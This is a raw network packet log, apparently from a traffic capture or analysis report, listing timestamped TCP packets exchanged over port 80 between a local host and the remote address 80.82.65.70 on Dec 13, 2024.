                                              Dec 13, 2024 10:49:14.831726074 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.831775904 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.834264994 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.834372997 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.834373951 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.834417105 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.836977959 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.837035894 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.837069988 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.837192059 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.839761972 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.839803934 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.839864969 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.842473030 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.842535973 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.947575092 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.947642088 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.947664976 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.947701931 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.948726892 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.948791981 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.948934078 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.948977947 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.951149940 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.951234102 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.951267958 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.951306105 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.953464985 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.953553915 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.953592062 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.953633070 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.955766916 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.955816984 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.955892086 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.955951929 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.958096027 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.958158970 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.958193064 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.958234072 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.960361004 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.960408926 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.960427046 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.960464001 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.962527990 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.962605953 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.962641001 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.962676048 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.964770079 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.964817047 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.964888096 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.965046883 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.966893911 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.966949940 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.967221975 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.967307091 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.969115019 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.969204903 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.969206095 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.969247103 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.971204996 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.971271038 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.971357107 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.971472979 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.973323107 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.973392010 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.973398924 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.973457098 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.975537062 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.975581884 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.975611925 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.975667000 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.977607012 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.977669001 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.977689981 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.977730989 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.979712009 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.979799986 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.979834080 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.979873896 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.981877089 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.981923103 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.982021093 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.982068062 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.983975887 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.984041929 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.984047890 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.984080076 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.986113071 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.986157894 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.986258030 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.986335039 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.988312960 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.988358021 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.988368988 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.988509893 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.990657091 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.990741968 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.990766048 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.990782022 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.992578983 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.992593050 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.992621899 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.992645025 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.994725943 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.994774103 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.994776011 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.994821072 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.996886015 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.996967077 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.996989965 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.997031927 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.998974085 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.999022007 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.999059916 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.999104977 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.001127958 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.001210928 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.001247883 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.001291990 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.003240108 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.003345966 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.003372908 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.003395081 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.005407095 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.005510092 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.005522966 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.005558968 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.007541895 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.007596016 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.043659925 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.163531065 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.790117025 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.790188074 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.790272951 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.790366888 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.791053057 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.791100025 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.791256905 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.791462898 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.793114901 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.793129921 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.793181896 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.793205023 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.795098066 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.795150995 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.795171976 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.795208931 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.797136068 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.797307014 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.797358036 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.799221992 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.799284935 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.799285889 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.799328089 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.801193953 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.801240921 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.801436901 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.801480055 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.803224087 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.803277969 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.803333998 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.803375006 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.805255890 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.805314064 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.805327892 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.805362940 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.807287931 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.807379007 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.807409048 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.807446003 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.809339046 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.809413910 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.809449911 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.809489012 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.811355114 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.811410904 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.811436892 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.811460972 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.813354969 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.813407898 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.813486099 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.813534021 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.817372084 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.817387104 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.817451000 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.817699909 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.817719936 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.817764997 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.817795992 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.819586992 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.819634914 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.819742918 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.819785118 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.821706057 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.821788073 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.821886063 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.821928024 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.823827028 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.823839903 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.823901892 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.823921919 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.825846910 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.825869083 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.825891972 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.825915098 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.827754974 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.827860117 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.827943087 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.827987909 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.829638004 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.829673052 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.829725981 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.829756975 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.831625938 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.831686020 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.831767082 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.831815004 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.833622932 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.833703995 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.833786964 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.833833933 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.837455988 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.837475061 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.837551117 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.837711096 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.837807894 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.837852955 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.840215921 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.840297937 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.840506077 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.840703011 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.872860909 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.872883081 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.872953892 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.872996092 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.873630047 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.873672009 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.873713017 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.873759031 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.877876997 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.877890110 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.877933979 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.878042936 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.878056049 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.878098011 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.879832029 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.879878998 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.879973888 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.880014896 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.881366968 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.881409883 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.881531000 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.881575108 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.886604071 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.886660099 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.886756897 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.886801958 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.888757944 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.888811111 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.889100075 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.889154911 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.890820026 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.890872002 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.891009092 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.891089916 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.892038107 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.892050028 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.892083883 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.892102003 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.893918991 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.894105911 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.894593954 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.894607067 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.894671917 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.895840883 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.895848036 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.895895004 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.897883892 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.897897005 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.897939920 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.899724007 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.899768114 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.899898052 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.899956942 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.904932976 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.904975891 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.905076981 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.905137062 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.907175064 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.907201052 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.907218933 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.907263041 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.909084082 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.909140110 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.909245968 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.909277916 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.911016941 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.911061049 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.911187887 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.911386967 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.913208961 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.913219929 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.913260937 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.915157080 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.915208101 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.915297031 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.915338039 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.916342020 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.916387081 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.916496992 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.916546106 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.918149948 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.918168068 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.918214083 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.918265104 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.918298960 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.918430090 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.918469906 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.920017004 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.920077085 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.920443058 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.920484066 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.922324896 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.922341108 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.922363997 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.922389030 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.923767090 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.923814058 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.923891068 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.923927069 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.926187992 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.926229954 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.927423954 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.927468061 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.929142952 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.929153919 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.929193020 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.930469990 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.930529118 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.982292891 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.982424021 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.982450008 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.982503891 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.983294964 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.983349085 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.983479977 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.983573914 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.985280991 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.985327959 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.985420942 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.985485077 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.986972094 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.987122059 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.987123966 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.987235069 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.989041090 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.989098072 CET804985880.82.65.70192.168.2.6
